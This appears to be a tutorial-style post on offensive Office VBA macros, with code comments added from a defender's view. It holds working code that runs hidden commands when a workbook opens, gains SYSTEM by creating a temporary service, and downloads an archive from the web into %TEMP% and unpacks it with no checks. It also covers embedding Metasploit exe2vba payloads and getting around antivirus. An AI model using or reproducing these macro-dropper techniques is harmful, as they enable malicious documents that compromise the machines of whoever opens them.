Run_Cmd "sc create systemCmd binpath= ""%COMSPEC% /c wscript %TEMP%\systemCmd.vbs "" type= own type= interact", INVISIBLE, WAIT
Run_Cmd "sc start systemCmd", INVISIBLE, WAIT
Run_Cmd "sc delete systemCmd", INVISIBLE, WAIT
' Remove both helper files. Kill raises a run-time error if a file is missing.
Kill Environ("TEMP") & "\systemCmd.vbs"
Kill Environ("TEMP") & "\systemBatch.bat"
End Function
This version only accepts an array of commands to be processed. I found that it was way too slow to process a large number of commands unless you did it this way. It would be simple to modify to accept a regular String instead, if you wish to change it to use it for one-off commands.
You'd call this with something like:
' Usage example: a String array with upper bound 1 (two slots, assuming the default
' lower bound of 0), each slot holding one command line for the generated batch file.
Dim syscmd(1) As String
syscmd(0) = "set && pause"
syscmd(1) = "ping 127.0.0.1"
' VISIBLE and WAIT are the constants the page defines as 1 and True.
Run_Sys_Cmds syscmd, VISIBLE, WAIT
It executes commands at the SYSTEM level by creating a service that will run your command for you. Unless you specify otherwise, services always run as the SYSTEM account. Creating services is only possible if you have Administrator-level privileges on the system, so I really only find this useful to get around locked files or antivirus.
It's on my TO DO list to play with the token-kidnapping exploit for Windows Server 2003/2008 (and supposedly XP2?) that allows any authenticated user to gain SYSTEM privileges. Unfortunately, I haven't had time to play with it yet.
VBA Function to Download Files
Unfortunately, MS didn't decide to give us a copy of wget, so we have to write it ourselves. This function uses the XMLHTTP object to download binary files and write them to disk. I don't remember where I found this code, but just for full disclosure, I didn't write it:
' Download_File: fetches vWebFile with an HTTP GET through MSXML2.XMLHTTP and writes
' the raw response body to vLocalFile, deleting any existing file at that path first.
'   vWebFile   - URL to request
'   vLocalFile - destination path on disk
' NOTE(review): the function is declared As Boolean but never assigns its return
' value, so callers always get False and cannot tell success from failure.
' NOTE(review): the HTTP status is never checked, so the body of an error response is
' saved as if it were the requested file. The local variable i is unused.
' Defender note: nothing verifies what was downloaded (no hash, signature or
' certificate check is made here). An Office process instantiating MSXML2.XMLHTTP and
' then writing a binary to disk is a common detection point for macro-based droppers.
Function Download_File(ByVal vWebFile As String, ByVal vLocalFile As String) As Boolean
Dim oXMLHTTP As Object, i As Long, vFF As Long, oResp() As Byte
'You can also set a ref. to Microsoft XML, and Dim oXMLHTTP as MSXML2.XMLHTTP
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
' Third argument False requests a synchronous call.
oXMLHTTP.Open "GET", vWebFile, False 'Open socket to get the website
oXMLHTTP.Send 'send request
'Wait for request to finish
' readyState 4 is the "complete" state; with a synchronous request this loop is
' presumably already satisfied when Send returns - TODO confirm.
Do While oXMLHTTP.readyState <> 4
DoEvents
Loop
oResp = oXMLHTTP.responseBody 'Returns the results as a byte array
'Create local file and save results to it
vFF = FreeFile
' An existing file at the destination is removed before writing.
If Dir(vLocalFile) <> "" Then Kill vLocalFile
Open vLocalFile For Binary As #vFF
Put #vFF, , oResp
Close #vFF
'Clear memory
Set oXMLHTTP = Nothing
End Function
Here's the call that will download a copy of the Tiny Web Server to the %TEMP% directory and use the local installation of Winzip to install it:
' Workbook_Open runs when the workbook is opened with macros enabled.
' Defender note: the archive is fetched over plain http:// and extracted into %TEMP%
' with no integrity check, so the content is whatever the network path delivers.
' The return value of Download_File is ignored, so extraction is attempted even if
' the download did not succeed.
Sub Workbook_Open()
'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
'Obviously in a real world application you'd want to bring your own unzipper
Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"
Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
End Sub
On VBA in Excel and Word Documents...
First, a quick note on converting executables to store in VBA. Based on my testing, the default Visual Basic Editor (VBE) that comes with MS Office 2003 (haven't tested 2007 yet) has a relatively low memory limit on how much you can store inside the script sections. This correlates to a max executable filesize of around 32k on my system. Anything larger than that you won't be able to paste in the output from metasploit's exe2vba because you will receive an error message, "Not Enough Memory".
I'm sure you could convert this script to allow you to store the hex strings inside a hidden, locked worksheet and reference it from the code sections. I don't know how many of you will run into this, as many of the metasploit payloads are only around ~10k.
Back to VBA, we'll start with a couple of simple functions that will allow you to run invisible commands or programs on the system:
' Run_Cmd: runs a command line through the command interpreter ("%COMSPEC% /c").
'   command         - text appended to "%COMSPEC% /c " exactly as given; nothing is
'                     quoted or escaped, so any shell metacharacters in it take effect
'   visibility      - window style passed to WshShell.Run (the page uses 1 = VISIBLE,
'                     0 = INVISIBLE)
'   wait_on_execute - passed to WshShell.Run; True blocks until the command finishes
' Defender note: this produces a cmd.exe child of the Office host process, which is
' unusual for ordinary documents and worth alerting on.
Sub Run_Cmd(command, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub
' Run_Program: launches a program directly with WshShell.Run, without going through
' the command interpreter.
'   program         - executable name or path, used as given (not quoted here, so a
'                     path containing spaces would need quotes from the caller)
'   arguments       - argument string appended after a single space
'   visibility      - window style passed to WshShell.Run (1 = VISIBLE, 0 = INVISIBLE)
'   wait_on_execute - True blocks until the program exits
Sub Run_Program(program, arguments, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
' The command line is plain concatenation, with a trailing space after the arguments.
WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute
End Sub
These would be called from within the "ThisWorkbook" tab in VBE with a function like:
' Window-style values handed to WshShell.Run by Run_Cmd and Run_Program.
Const VISIBLE = 1, INVISIBLE = 0
' Wait flags: WAIT blocks the macro until the launched process ends, NOWAIT does not.
Const WAIT = True, NOWAIT = False
' Workbook_Open runs when the workbook is opened with macros enabled; this example
' starts a visible ping and then Notepad without waiting for it to exit.
Sub Workbook_Open()
Run_Cmd "ping 127.0.0.1", VISIBLE, WAIT
Run_Program "notepad.exe", "", VISIBLE, NOWAIT
End Sub
INVISIBLE / VISIBLE does just what you would think: toggles the visibility of the program or command as you wish. WAIT / NOWAIT also functions as you would expect; if set to WAIT, the VBA execution will halt until the process finishes. NOWAIT continues execution as soon as the program/command begins.